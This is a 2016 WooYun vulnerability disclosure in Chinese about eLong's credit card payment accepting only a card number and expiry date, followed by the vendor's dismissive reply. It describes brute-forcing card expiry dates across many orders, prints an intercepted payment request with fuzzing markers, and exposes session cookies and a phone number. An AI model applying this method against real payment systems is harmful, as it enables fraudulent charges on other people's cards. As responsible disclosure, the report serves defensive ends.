当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188155

漏洞标题:艺龙旅行网严重支付漏洞(只需知道银行信用卡号即可消费)

相关厂商:艺龙旅行网

漏洞作者: Focusstart

提交时间:2016-03-23 15:32

修复时间:2016-03-24 02:22

公开时间:2016-03-24 02:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

感谢壮丁的友情赞助,好基友,一起走。

详细说明:

首先,在艺龙随便下了一个订单,到支付页面,选择信用卡支付
输入正确的卡号,有效期
姓名,身份证等相关信息随便输

2.png


居然支付成功了。
那么问题来了
说明这里只判断信用卡有效期即可成功支付
接下来就简单了,我们只要尝试爆破出信用卡的有效期即可
然后发现错误的有效期也能使订单到判定支付是否成功的阶段

漏洞证明:

所以。下多个订单

3.png


随便点击一个订单到支付页面
抓包

POST /epay/isajax/CreditCardExtend/Save HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: https://secure.elong.com/epay/cn/creditcardextend/433877263696341615train
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: secure.elong.com
Content-Length: 360
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SessionGuid=42ff44d5-95e9-4a84-a57b-0199c4a28a59; com.eLong.CommonService.OrderFromCookieInfo=Pkid=50&Parentid=50000&Coefficient=0.0&Status=1&Priority=8000&Makecomefrom=0&Savecookies=0&Cookiesdays=0&Isusefparam=0&Orderfromtype=1; s_cc=true; s_sq=elongcom%3D%2526pid%253Dmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%25253Frnd%25253D20160323142748598%252523%25253F%2526ot%253DA%2526oi%253D413; CookieGuid=bf5e468c-2c0e-4e32-a174-c6b00a59600b; Esid=72832668-11ae-4cf6-8486-f2a53dda7c15; member=18075958330; Lgid=LRpRtrsC3gsExwGXhEk%2flpaR3waA7McUH7SGryL5%2fSFdUfZTcxrrKJN7gDYF38TJf%2b6813mw0I7%2bEqLpl1r2dNM00g3TNSUIsbfjUZc3xAoySWAQkZq3Hr3%2fuLPImoK3; s_visit=1; route=d99f2606f97cd9d480bdb1efdeca5346; ASP.NET_SessionId=go0f0j550ckcs055bbbdmvu1; TLTCNT=CHG-OWEBTJ10000000000077396
language=cn&id=§433877263696341615train§&paymentInfo.CreditCardNumber=******&paymentInfo.Cardholder=%E6%B5%8B%E8%AF%95&paymentInfo.FirstName=&paymentInfo.MiddleName=&paymentInfo.LastName=&paymentInfo.CardValidity=§2022-1§&paymentInfo.CertificateTypeID=2&paymentInfo.CertificateNumber=321321&paymentInfo.CheckedLast4Num=false&paymentInfo.IdOfCardsHistory=


5.png


订单+有效期爆破。隔几秒放过
那么订单都会到判断支付是否成功的阶段,如果订单支付成功,说明有效期是正确的
成功爆破出信用卡有效期并成功支付

7.png


6.png


1.jpg

修复方案:

信用卡支付逻辑是不是该有有效期+CVV码+手机验证码组成?

版权声明:转载请注明来源 Focusstart@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-24 02:22

厂商回复:

亲爱的乌云同行及白帽子,您们好:
经过我们与贵方的多次沟通和解释,此问题为有误解的错误漏洞报告。在艺龙平台上的信用卡支付过程中,不同的银行确实会要求提交不同的用户信用卡信息。有的银行自己设定只需要信用卡号和有效期就可以完成支付,而不需要其他例如验证CVV码的流程,但是后续控制措施会从用户看不到的其他方面加以弥补。有时需要额外收集身份证信息是用于和部分银行信用卡中心核对持卡人身份,是属于一个保证支付安全的内部控制加强措施。
众所周知,使用假信用卡或盗用他人的信用卡信息进行支付是非常严重的违法行为,作为已经在本行业经营十多年的成熟企业,艺龙提醒广大用户妥善保管好自己的信用卡信息。艺龙已经通过了PCI DSS认证(Payment Card Industry Data Security Standard,由国际顶级信用卡公司Visa,MasterCard,JCB等联合出台的全球信用卡信息安全标准),将与银行和同业公司一起努力为广大用户提供更安全,更方便和更快捷的支付体验。
作为艺龙公司,我们非常重视用户的所有安全问题,如有咨询请随时与艺龙公司联系,感谢您的大力支持!

最新状态:

暂无